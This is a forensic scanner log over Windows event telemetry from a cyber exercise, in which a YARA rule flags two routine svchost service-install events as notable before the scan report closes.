{"_index": "cyberpolygon2024-mercurylark-win", "_id": "1WnKt5EBNKI3r7qcapQH", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.386Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\twebthreatdefusersvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t2\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "f[...]_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p", "ServiceName": "webthreatdefusersvc_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "2", "SubjectUserName": "PC00025$"}, "record_id": 195209, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 10
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "2GnKt5EBNKI3r7qcapMD", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.360Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tDeviceAssociationBrokerSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"name": "pc00025", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "w[...]": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p", "ServiceName": "DeviceAssociationBrokerSvc_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195195, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 11
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 12
Sep 10 18:29:12 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 18:29:12 2024
ALERTS:
0
WARNINGS:
18
NOTICES:
11
ERRORS:
0